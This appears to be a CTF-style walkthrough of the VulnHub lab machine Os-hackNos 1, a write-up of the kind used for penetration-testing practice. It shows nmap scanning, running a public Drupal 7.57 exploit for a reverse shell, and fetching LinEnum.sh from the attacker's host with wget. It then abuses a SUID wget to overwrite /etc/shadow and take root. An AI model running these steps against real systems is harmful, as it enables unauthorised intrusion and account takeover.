Os-hackNos 1 walkthrough

Hello there! Today we will try to get root of the VulnHub machine named hackNos: Os-hackNos.

Let’s see the description. It’s easy to intermediate difficulty machine, has 2 flags (user and root) and based on Web-application (that’s what I love).


Okay, let’s start. First of all we have to find the victim in our subnet. Its MAC address is 08:00:27:C2:A4:A8. We will use netdiscover app.

netdiscover -i eth0 -r

The IP address of our victim is Next step is to scan the machine and try to find open ports. As you can guess we are using nmap. So, let’s type…

nmap -p 1-65535 -T4 -A -v

Not so much but enough to continue pentest. We have 2 open ports:

  • 22 port – SSH, common for Linux
  • 80 port – HTTP, common web-site port w/o SSL

We don’t have credits to connect via SSH yet so our target is HTTP. Let’s enumerate the catalogs of the website. DirB is very helpful for it.


Very interesting. We found Drupal CMS installed into drupal/ directory. We have also robots.txt so we can find other interesting files and catalogs. Let start from robots.txt

curl | grep Disallow

Changelog.txt Thank you system administrator for leaving this file. What’s the changelog? A changelog is a log or record of all notable changes made to a project, usually includes records of changes such as bug fixes, new features, etc. and current version of application. So let’s find it out.

curl | more

Current Drupal version is 7.57 (2018-02-21). Pretty old. Maybe we can find an exploit for it? We will use searchsploit.

searchsploit drupal | grep 7.5

Ok, we found 3 exploits which related to our machine’s app. But 2 of them require to be authenticated in the system. We have the last one – 44449.rb, which can help us to get reverse shell. Let’s use it. Copy the exploit to our working directory, make it executable and run ti.

cp /usr/share/exploitdb/exploits/php/webapps/44449.rb .
chmod +x 44449.rb

But when we tried to execute it we had an error: cannot load such file — highline/import (LoadError). It’s not a problem. We will fix it, just type…

gem install highline; gem install import

After the all gems were installed we can run the exploit once again.

ruby 44449.rb

And we got shell under the www-data.

ifconfig; whoami; id

The common tool to check Linux’s bad settings is LinEnum.sh (you can easily google it). So let’s copy that file to our working directory, start the simple HTTP server and upload it to the victim to find something interesting.

To start simple HTTP server enter on your local machine:

php -S

Then using wget download from local machine LinEnum.sh


Let’s check if everything is ok. List the catalog.


Our file was successfully uploaded to the victim. And one more interesting fact: our file was downloaded under the root. Hmm, interesting. We will keep it in mind. But now let’s finish enumeration.


What can we see. We have only 1 user in the system – james and he has administrative privileges. Also we have SUID under root at /usr/bin/wget. That’s why our file was saved under the root.

What does it mean? It means that we can write and REwrite any file in the system including … /etc/shadow where are all the users passwords. So let’s change james and root passwords. Go back to our local machine, copy /etc/shadow to our working directory and open it. Then copy the root string and paste it below. Change the root to james. Save it and run the HTTP server.


I use Kali Linux on VirtualBox, so the common password for root is toor. I copied it to james so the password for james became toor too. Now let’s upload it into the victim.

wget -O /etc/shadow

Ok, new file is in the system. Let’s try to connect to james.

ssh james@
james@ password: toor

And we are in. Good job. Let’s escalate privileges.

As you remember we changed all the password, including root. So let log in as root.

sudo su

And we are root in the system. Congrats!)

The last thing we have to do is to get the flags!

cat /home/james/user.txt
cat /root/root.txt

That’s all. We did everything! See you soon 😉